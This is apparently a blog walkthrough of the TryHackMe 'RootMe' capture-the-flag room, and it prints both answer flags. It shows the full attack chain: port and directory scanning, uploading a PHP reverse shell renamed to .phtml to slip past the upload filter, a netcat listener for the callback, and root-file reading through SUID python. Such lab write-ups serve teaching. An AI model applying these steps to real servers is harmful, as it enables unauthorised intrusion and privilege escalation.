RootMe
This is a very basic CTF room from tryhackme.com – you basically guided through step by step. Let’s have a look.
sudo nmap -sV 10.10.189.114
So there we have our first three answers: 2 Ports, Apache 2.4.29 and on 22 a ssh server is running.
Time for gobuster
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.189.114 -x php,txt,html,js,pdf
So panel is our next answer.
When we visit the panel URL we see a simple upload form and our task is to upload a webshell. In kali there is one at
/usr/share/webshells/php/php-reverse-shell.php
But you can easily find them on the web as well.
First of all we copy it to our working directory, shorten the name and change the extension.
cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php rs.phtml
The name shortening is just for convenience – changing the extension has a practical reason: .php files are most often blocked by upload forms. .phtml files are more likely to go through
We no have to change the rs.phtml a bit.
vi rs.phtml
We have to change the $ip variable to that of our local machine so the reverse shell can connect back to us.
We then can upload the rs.phtml.
That went through – good.Now we need to setup netcat on our end to listen to the reverse shell.
The reverse shell is looking for us on port 1234 so our netcat command is
nc -lnvp 1234
From our gobuster scan we know that there is an upload directory – we assume our rs.phtml file is there now – so lets try.
We open
http://10.10.189.114/uploads/rs.phtml
with the browser and immediatly see this on our netcat session:
So let’s look for the user flag. Or be lazy and let linux find it for us:
find / -name user.txt 2>/dev/null
It is und /var/www/user.txt and reads
THM{y0u_g0t_a_sh3ll}
So thats our first answer.
Next we are supposed to look for files with the SUID flag. So let’s do that.
find / -perm -4000 -user root 2>/dev/null
The interesting result is
/usr/bin/python
Because it means we can execute python with root privileges.
We assume the root flag in /root/root.txt – so lets just try to read it out using python.
python -c 'print(open("/root/root.txt").read())'
And we are lucky. It prints out the root flag wich is
THM{pr1v1l3g3_3sc4l4t10n}